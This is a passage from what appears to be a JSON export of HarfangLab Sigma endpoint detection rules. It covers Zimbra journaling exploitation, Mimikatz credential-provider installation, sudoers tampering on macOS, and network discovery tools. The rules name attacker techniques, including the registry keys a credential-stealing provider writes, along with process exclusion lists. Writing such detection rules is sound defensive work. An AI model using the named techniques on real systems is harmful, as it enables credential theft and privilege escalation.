"rule_description": "Detects the suspicious creation of child processes by the postjournal service related to the exploitation of a Zimbra vulnerability.\nThis behavior is related to the exploitation of the \"exchange compatible journaling\" feature on non-patched Zimbra instances.\nThis flaw allows remote unauthenticated attackers to execute arbitrary commands.\nIt is recommended to gather more information about the Zimbra instance and to investigate the command-line.\n",
"rule_creation_date": "2024-10-09",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1190"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "db074059-eadd-4530-a103-5dbf7732b80f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094743Z",
"creation_date": "2026-03-23T11:45:34.094745Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094749Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kcredentialprovider.c",
"https://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/",
"https://attack.mitre.org/techniques/T1556/002/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1556_002_credential_provider_mimikatz.yml",
"content": "title: Mimikatz Credential Provider Installed\nid: db074059-eadd-4530-a103-5dbf7732b80f\ndescription: |\n Detects the installation of the Mimikatz credential provider.\n Attackers can install this credential provider in order to obtain user credential.\n It is recommended to isolate infected systems, to look for the unwanted usage of stolen credentials on others hosts (e.g via Path-the-Hash), and to start memory forensics to determine extracted credentials.\nreferences:\n - https://github.com/gentilkiwi/mimikatz/blob/master/mimilib/kcredentialprovider.c\n - https://blog.leetsys.com/2012/01/02/capturing-windows-7-credentials-at-logon-using-custom-credential-provider/\n - https://attack.mitre.org/techniques/T1556/002/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2021/06/17\nmodified: 2025/01/17\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1556.002\n - attack.t1003\n - classification.Windows.Source.Registry\n - classification.Windows.HackTool.Mimikatz\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_1:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{DC2EB890-F593-4E6D-A085-E8C112CFBEC4}\\(Default)'\n - 'HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\{DC2EB890-F593-4E6D-A085-E8C112CFBEC4}\\(Default)'\n selection_2:\n EventType: SetValue\n TargetObject|contains:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\'\n - 'HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Authentication\\Credential Providers\\'\n Details: 'mimilib'\n condition: 1 of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "db074059-eadd-4530-a103-5dbf7732b80f",
"rule_name": "Mimikatz Credential Provider Installed",
"rule_description": "Detects the installation of the Mimikatz credential provider.\nAttackers can install this credential provider in order to obtain user credentials.\nIt is recommended to isolate infected systems, to look for the unwanted usage of stolen credentials on other hosts (e.g. via Pass-the-Hash), and to start memory forensics to determine the extracted credentials.\n",
"rule_creation_date": "2021-06-17",
"rule_modified_date": "2025-01-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1556.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "db3b6a01-e4b7-4b1e-825c-d14f1b9b73bf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295096Z",
"creation_date": "2026-03-23T11:45:35.295099Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295106Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/",
"https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html",
"https://www.manpagez.com/man/3/confstr/",
"https://attack.mitre.org/techniques/T1083/"
],
"name": "t1083_python_confstr_user_temp_dir.yml",
"content": "title: User Temporary Directory Discovered via Python\nid: db3b6a01-e4b7-4b1e-825c-d14f1b9b73bf\ndescription: |\n Detects the discovery of the user temporary directory via the python3 os.confstr function.\n Attackers may use it during the discovery phase of an attack to retrieve the user temporary directory.\n It is recommended to check for other suspicious activity by the process and its parent.\nreferences:\n - https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/\n - https://opensource.apple.com/source/Libc/Libc-583/include/unistd.h.auto.html\n - https://www.manpagez.com/man/3/confstr/\n - https://attack.mitre.org/techniques/T1083/\ndate: 2022/12/08\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.Python\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/usr/bin/python'\n - '/usr/bin/python2'\n - '/usr/bin/python3'\n # _CS_DARWIN_USER_TEMP_DIR\n CommandLine|contains|all:\n - '-c'\n - 'os.confstr(65537)'\n ParentImage|contains: '?'\n\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "db3b6a01-e4b7-4b1e-825c-d14f1b9b73bf",
"rule_name": "User Temporary Directory Discovered via Python",
"rule_description": "Detects the discovery of the user temporary directory via the python3 os.confstr function.\nAttackers may use it during the discovery phase of an attack to retrieve the user temporary directory.\nIt is recommended to check for other suspicious activity by the process and its parent.\n",
"rule_creation_date": "2022-12-08",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1083"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "db6caac2-abb0-419f-9f88-47a708a074d6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628536Z",
"creation_date": "2026-03-23T11:45:34.628538Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628542Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man8/ip-neighbour.8.html",
"https://attack.mitre.org/techniques/T1018/"
],
"name": "t1018_ip_neighbour.yml",
"content": "title: Ip Neighbour Execution\nid: db6caac2-abb0-419f-9f88-47a708a074d6\ndescription: |\n Detects the execution of the IP neighbour utility to display the neighbour table (ARP cache).\n Attackers may use it during discovery phase to discover remote systems.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://man7.org/linux/man-pages/man8/ip-neighbour.8.html\n - https://attack.mitre.org/techniques/T1018/\ndate: 2022/12/23\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1018\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ip'\n CommandLine|contains: ' n' # neighbour\n ParentImage|contains: '?'\n\n filter_not_neighboor_options:\n CommandLine|contains:\n - ' netns'\n - ' nomaster'\n\n exclusion_not_show:\n CommandLine|contains:\n - ' add'\n - ' change'\n - ' replace'\n - ' delete'\n - ' flush'\n - ' get'\n\n exclusion_insights:\n CommandLine: '/sbin/ip -? 
neighbor show nud all'\n ParentImage: '/usr/bin/timeout'\n\n exclusion_sosreport:\n - ParentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n - GrandparentCommandLine: '/usr/bin/python /usr/sbin/sosreport'\n - GrandparentCommandLine|startswith: '/usr/bin/python /usr/sbin/sosreport '\n\n exclusion_sosreport_2:\n ParentImage: '/usr/bin/timeout'\n GrandparentCommandLine|contains:\n - ' sosreport --tmp-dir '\n - ' /usr/sbin/sosreport'\n - ' /sbin/sosreport'\n - ' /usr/sbin/sos report'\n\n exclusion_gitlab:\n - ParentCommandLine|contains: '/opt/gitlab/embedded/bin/ruby /opt/gitlab/embedded/bin'\n - GrandparentCommandLine: '/bin/bash /opt/gitlab/bin/gitlab-ctl reconfigure'\n - GrandparentImage|startswith: '/opt/gitlab/embedded/bin/'\n\n exclusion_qemu:\n ParentCommandLine: '/usr/bin/perl /var/lib/qemu-server/pve-bridgedown *'\n GrandparentImage: '/usr/bin/qemu-system-x86_64'\n\n exclusion_pihole:\n GrandparentImage: '/usr/bin/pihole-FTL'\n\n exclusion_insights_client:\n CommandLine:\n - '/sbin/ip -4 neighbor show nud all'\n - '/sbin/ip -6 neighbor show nud all'\n ParentCommandLine|startswith:\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/bin/python* /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/bin/python* /usr/bin/insights-client-run '\n\n exclusion_bettercap:\n ParentCommandLine|startswith: '/tmp/bettercap '\n\n exclusion_modprobe:\n ParentCommandLine:\n - '/bin/sh /usr/local/bin/modprobe nf_tables'\n - '/bin/sh /usr/local/bin/modprobe -va nf_conntrack'\n\n exclusion_libvirt:\n ParentImage:\n - '/usr/bin/libvirtd'\n - '/usr/sbin/libvirtd'\n\n exclusion_wgquick:\n ParentCommandLine: '/bin/bash /usr/bin/wg-quick up new-tooling'\n\n exclusion_containerd:\n Ancestors|contains:\n - '/bin/runc|'\n - '/bin/containerd-shim-runc-v2|'\n - '|/usr/sbin/cron|'\n - '|/usr/sbin/crond|'\n - '|/opt/bmc/bladelogic/RSCD/sbin/bldeploy|'\n - '|/opt/bladelogic/*/NSH/sbin/bldeploy|'\n\n exclusion_chef:\n 
ParentImage:\n - '/opt/chef/embedded/bin/ruby'\n - '/opt/chefdk/embedded/bin/ruby'\n\n exclusion_facter:\n ParentImage: '/usr/bin/facter'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "db6caac2-abb0-419f-9f88-47a708a074d6",
"rule_name": "Ip Neighbour Execution",
"rule_description": "Detects the execution of the IP neighbour utility to display the neighbour table (ARP cache).\nAttackers may use it during the discovery phase to discover remote systems.\nIt is recommended to investigate the parent process for suspicious activities.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "db7909aa-b0a9-4065-9539-4587611d632f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626824Z",
"creation_date": "2026-03-23T11:45:34.626826Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626830Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1",
"https://attack.mitre.org/techniques/T1548/003/"
],
"name": "t1548_003_sudo_config_modified_macos.yml",
"content": "title: Sudo Configuration Modified (macOS)\nid: db7909aa-b0a9-4065-9539-4587611d632f\ndescription: |\n Detects a suspicious attempt to modify the content of /etc/sudoers or any file within /etc/sudoers.d.\n These files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\n Their modification can be an attempt to elevate privileges.\n It is recommended to verify if the process performing the modification has legitimate reason to do so.\nreferences:\n - https://twitter.com/CraigHRowland/status/1580658905910108160/photo/1\n - https://attack.mitre.org/techniques/T1548/003/\ndate: 2024/06/18\nmodified: 2026/02/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.PrivilegeEscalation\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n\n selection_files:\n - Path:\n - '/private/etc/sudoers'\n - '/private/etc/sudoers.d/*'\n - TargetPath:\n - '/private/etc/sudoers'\n - '/private/etc/sudoers.d/*'\n selection_process:\n ProcessImage|contains: '?'\n\n filter_is_read:\n Kind: 'read'\n\n filter_visudo:\n - Image: '/usr/sbin/visudo'\n - ProcessGrandparentCommandLine|startswith: '/bin/bash /Users/*/.battery-tmp/battery/battery.sh visudo '\n\n exclusion_kandji:\n Image: '/Library/Kandji/Kandji Agent.app/Contents/Helpers/Kandji Parameter Agent.app/Contents/MacOS/kandji-parameter-agent'\n\n exclusion_jamf:\n - ProcessAncestors|contains: 
'/usr/local/jamf/bin/jamf'\n - ProcessGrandparentCommandLine: '/Library/Application Support/JAMF/tmp/'\n - ProcessParentCommandLine|startswith: '/bin/bash /Library/Application Support/JAMF/'\n\n exclusion_beyondco_helper:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'de.beyondco.herd.helper'\n\n exclusion_brew:\n ProcessParentCommandLine:\n - 'sudo tee -a /etc/sudoers.d/brew-nopasswd'\n - 'sudo chmod 440 /etc/sudoers.d/brew-nopasswd'\n\n exclusion_atera:\n ProcessParentImage: '/Applications/AteraAgent.app/Contents/MacOS/AteraAgent'\n\n exclusion_jumpcloud:\n ProcessImage: '/opt/jc/bin/jumpcloud-agent'\n\n exclusion_intunes:\n ProcessAncestors|contains: '/Library/Intune/Microsoft Intune Agent.app/Contents/MacOS/IntuneMdmDaemon'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "db7909aa-b0a9-4065-9539-4587611d632f",
"rule_name": "Sudo Configuration Modified (macOS)",
"rule_description": "Detects a suspicious attempt to modify the content of /etc/sudoers or any file within /etc/sudoers.d.\nThese files contain the configuration of the 'sudo' utility, used to give temporary privileges to an application.\nTheir modification can be an attempt to elevate privileges.\nIt is recommended to verify if the process performing the modification has legitimate reason to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-02-09",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dba28126-8b26-439d-8982-4719d1c57682",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083422Z",
"creation_date": "2026-03-23T11:45:34.083424Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083429Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/getmac",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_getmac.yml",
"content": "title: Getmac Execution\nid: dba28126-8b26-439d-8982-4719d1c57682\ndescription: |\n Detects the execution of the Getmac.exe binary.\n Getmac returns the media access control (MAC) address and the list of network protocols associated with each address for all network cards in each computer, either locally or across a network.\n Attackers may use it during discovery phase to gather information about the host.\n It is recommended to analyze the context behind the execution of this command with the process tree to determine its legitimacy.\nreferences:\n - https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/getmac\n - https://attack.mitre.org/techniques/T1016/\ndate: 2022/12/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\getmac.exe'\n - OriginalFileName: 'getmac.exe'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_grandparentimage:\n GrandparentImage:\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft Azure Storage Explorer\\StorageExplorer.exe'\n - '*\\AppData\\Local\\Programs\\monsisraapp\\MonSisra2.exe'\n - '*\\AppData\\Local\\monsisraapp\\app-*\\MonSisra2.exe'\n - '*\\AppData\\Local\\Programs\\MonSisra2\\MonSisra2.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe'\n\n 
exclusion_mofcompiler:\n ParentImage: '?:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe'\n CommandLine: 'getmac'\n\n exclusion_visual_studio:\n ParentImage:\n - '?:\\Windows\\Temp\\\\*\\vs_bootstrapper_d15\\vs_setup_bootstrapper.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\vs_bootstrapper_d15\\vs_setup_bootstrapper.exe'\n - '*\\Common7\\IDE\\devenv.exe'\n - '*\\Common7\\IDE\\Blend.exe'\n - '*\\Common7\\ServiceHub\\Controller\\Microsoft.ServiceHub.Controller.exe'\n - '*\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.netfx.x86\\ServiceHub.IdentityHost.exe'\n - '*\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.dotnet.x64\\ServiceHub.VSDetouredHost.exe'\n\n exclusion_jetbrains:\n ParentImage: '?:\\Users\\\\*\\AppData\\Local\\JetBrains\\JetBrains Rider *\\bin\\rider64.exe'\n\n exclusion_jetbrains_signed:\n ProcessParentOriginalFileName:\n - 'rider64.exe'\n - 'idea64.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'JetBrains s.r.o.'\n\n exclusion_dahua:\n - ParentImage: '?:\\DSS\\DSS Server\\jre\\bin\\VMS_CFGS.exe'\n - GrandparentImage:\n - '?:\\DSS\\DSS Server\\SS\\VMS_SS.exe'\n - '?:\\DSS\\DSS Server\\PTS\\VMS_PTS.exe'\n - '?:\\DSS\\DSS Server\\SS\\CQFSTools.exe'\n - '?:\\DSS Express\\Server\\SS\\DSS_SS.exe'\n - '?:\\DSS Express\\Server\\PTS\\DSS_PTS.exe'\n - '?:\\DSS Express\\Server\\SS\\CQFSTools.exe'\n\n exclusion_dahua_signed:\n # \\DSS Server\\PTS\\VMS_PTS.exe\n # \\DSS Server\\SS\\VMS_SS.exe\n # \\DSS Server\\SS\\CQFSTools.exe\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Zhejiang Dahua Technology Co., Ltd.'\n\n exclusion_3dvista:\n ProcessAncestors|contains: '|?:\\Program Files\\3DVista\\3DVista Virtual Tour\\3DVista Virtual Tour.exe|'\n\n exclusion_mailspring:\n ProcessGrandparentOriginalFileName: 'Mailspring.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Foundry376'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "dba28126-8b26-439d-8982-4719d1c57682",
"rule_name": "Getmac Execution",
"rule_description": "Detects the execution of the Getmac.exe binary.\nGetmac returns the media access control (MAC) address and the list of network protocols associated with each address for all network cards in each computer, either locally or across a network.\nAttackers may use it during discovery phase to gather information about the host.\nIt is recommended to analyze the context behind the execution of this command with the process tree to determine its legitimacy.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "dc40e7d9-a996-45bf-a2ae-f8caf1816852",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591776Z",
"creation_date": "2026-03-23T11:45:34.591779Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591787Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1016/",
"https://attack.mitre.org/software/S0100/"
],
"name": "t1016_ipconfig.yml",
"content": "title: Ipconfig Execution\nid: dc40e7d9-a996-45bf-a2ae-f8caf1816852\ndescription: |\n Detects the execution of ipconfig.exe, a legitimate Windows utility used to gather network interface information.\n Adversaries may execute ipconfig.exe to collect network information for reconnaissance or data exfiltration purposes.\n It is recommended to investigate the source and context of ipconfig.exe execution and correlate this alert with other discovery activities.\nreferences:\n - https://attack.mitre.org/techniques/T1016/\n - https://attack.mitre.org/software/S0100/\ndate: 2021/05/17\nmodified: 2025/02/19\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - attack.s0100\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_normal:\n - Image|endswith: '\\ipconfig.exe'\n # Renamed binaries\n - OriginalFileName: 'ipconfig.exe'\n\n selection_parent:\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # instances of `ipconfig` where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ParentImage|contains: '\\'\n\n exclusion_commandline:\n CommandLine|contains:\n # -release and -release6\n - '-release'\n # /release and /release6\n - '/release'\n - '-renew'\n - '/renew'\n - '-flushdns'\n - '/flushdns'\n - '-displaydns'\n - '/displaydns'\n - '-registerdns'\n - '/registerdns'\n\n exclusion_programfiles:\n - ParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - 
'?:\\Program Files (x86)\\'\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Windows\\System32\\sdiagnhost.exe'\n - '?:\\Windows\\SysWOW64\\sdiagnhost.exe'\n - '?:\\Pritunl\\pritunl-service.exe'\n - '?:\\WindowsAzure\\Packages\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\Telemetry\\WindowsAzureTelemetryService.exe'\n - '?:\\WindowsAzure\\Packages_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\Packages_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\GuestAgent\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WindowsAzureGuestAgent.exe'\n - '?:\\WindowsAzure\\GuestAgent_*\\WaAppAgent.exe'\n - '?:\\WindowsAzure\\Packages\\WaAppAgent.exe'\n - '?:\\Windows\\System32\\CompatTelRunner.exe'\n\n exclusion_grandparent:\n GrandparentImage:\n - '*\\Microsoft SQL Server\\MSSQL??.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe'\n - '*\\Microsoft SQL Server\\MSSQL??.VIVA\\MSSQL\\Binn\\sqlservr.exe'\n # C:\\Users\\xxxx\\AppData\\Local\\Temp\\ESETLogCollector64_4212.exe\n - '*\\AppData\\Local\\Temp\\ESETLogCollector??_*.exe'\n - '*\\AppData\\Local\\Programs\\oz-client\\Poly Lens.exe'\n\n exclusion_explorer1:\n ParentImage: '?:\\Windows\\explorer.exe'\n GrandparentImage: '?:\\Windows\\System32\\userinit.exe'\n\n exclusion_explorer2:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_explorer3:\n ParentImage:\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n - '?:\\Program Files\\WindowsApps\\Microsoft.PowerShell_*\\pwsh.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage: '?:\\Program 
